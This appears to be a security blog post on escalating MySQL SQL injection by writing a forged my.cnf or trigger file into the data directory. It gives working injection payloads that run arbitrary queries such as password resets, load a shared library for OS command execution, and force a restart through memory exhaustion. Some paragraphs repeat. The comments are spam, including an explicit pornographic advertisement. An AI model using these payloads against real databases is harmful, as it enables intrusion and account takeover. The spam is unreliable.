We would like to open our blog notes on the practical implementation of the SQL-injections.
And also we try to focus more attention on the practical aspects of web application security in the future.
SQL injections are the most common server-side Web application vulnerabilities and meet almost every audit in our practice.
Very often it happens that through these vulnerabilities we can write files (granted FILE_PRIV).
The simplest way of the exploitation in this case - write executable script (i.e. shell.php) in www-root (i.e. /var/www/).
But sometimes there is no filesystem rights to write in /var/www.
We would like to present a method for the operation of these vulnerabilities to execute arbitrary queries and even commands (tested in Debian lenny).
This is not the easiest attack vector, but it is possible!
But sometimes there is no filesystem rights to write in /var/www.
We would like to present a method for the operation of these vulnerabilities to execute arbitrary queries and even commands (tested in Debian lenny).
This is not the easiest attack vector, but it is possible!
The idea is very simple and is to replace the file my.cnf. This configuration file is write-protected directory:
-rw-r--r-- 1 root root 3596 /etc/mysql/my.cnf
#debian lenny
However, if you write my.cnf in DATADIR it will work! And DATADIR is writable always:
drwx------ 4 mysql mysql 4096 /var/lib/mysql
#debian lenny
Then look at documentation:
Finally, attack vector will be like that:
'AND 1=2 UNION SELECT '[mysqld]\ninit-connect="update users set passwd=123 where id=0"\n#'
INTO OUTFILE '/var/lib/mysql/my.cnf'-- -
INTO OUTFILE '/var/lib/mysql/my.cnf'-- -
Now you can execute any query from SQL-injection into SELECT statement and FILE_PRIV.
Query in init-connect will be executed after the non-SUPER user logs in.
And there is another problem - you must somehow restart MySQL daemon.
The easiest way to wait until it happens naturally.
But you can always send a hard query to exceed a memory limit.
Then OOM Killer make your job ;)
On MySQL 5.1.2+ (required by http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_plugin_dir) you can also execute OS commands by my.cnf like that:
[mysqld]
plugin_dir = /var/tmp/aaa # 5.1.2+ only
init-connect = "CREATE FUNCTION do_system RETURNS INTEGER SONAME 'so_system.so.0.0';"
# 2 3 4 5 6 7 8 9 10 11
Where /var/tmp/aaa is any writable directory, so_system.so.0.0 is your binary library.
AND 1=0 union select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/users/user.TRG' LINES TERMINATED BY '\\ntriggers=\'CREATEDEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nupdate user set isadmin=0 whereisadmin=1;\\nend\'sql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';
//Alexander Golovko, Vladimir d0znpp Vorontsov
wow, this is very advance :)
ОтветитьУдалитьHi,
ОтветитьУдалитьLovely post. Thanks for the share!
Regards,
GPA Calculator
Beside guiding, you will likewise find out about the abilities you have to adapt in the rest of the world, where enticement will consistently be hiding. You will likewise be determined to a wellbeing program which encourages you to get fit and appreciate exercise and sustenance with the goal that you kick your propensity as well as become a more beneficial person generally speaking. Liquor rehab can be perhaps the best thing that transpires. In the event that you are prepared to find support and quit drinking, set up an arrangement to meet with a rehab focus and get your life back. Try not to be embarrassed. You can do it and will have the option to roll out the improvements you have to improve personally.
ОтветитьУдалитьalcohol rehab center florida
inpatient alcohol rehab florida
There are 281 films right here proper now taken from 76 complete-duration DVDs, and you're able to watch them as standalone scenes or as scenes so as from a DVD, as there are sections for both scenes and complete DVDs, so it's clean. New movies are introduced five times consistent with month, and they take a selected topic. It's all realty fashion filming and steps, with excellent performing from the guys and girls to set the scenes, and that's commonly about a wife being bored, or looking to play away, or making her husband watch as she bangs another guy. There also are a few gangbang films, recently there's been a few sizzling interracial movement, and there are a few threesomes. All the time, the babes are lovely, the boners are big, and the balls unload cum in pussies, creampies, mouths and on mature, company boobs at yespornplease
ОтветитьУдалитьyespornplease
yespornplease.com
I am often to blogging and i really appreciate your content. The article has really peaks my interest. I am going to bookmark your site and keep checking for new information.
ОтветитьУдалитьCodepen.io
Information
Click Here
Visit Web
Oh my goodness! an amazing article dude. Thank you However I am experiencing issue with ur rss. Don’t know why Unable to subscribe to it. Is there anyone getting identical rss problem? Anyone who knows kindly respond. Thnkx
ОтветитьУдалитьCalis.delfi.lv
Information
Click Here
Visit Web
수원출장안마
ОтветитьУдалить의령출장안마
김포출장안마
김포출장안마
남양주출장안마
성남출장안마
함안출장안마
수원출장안마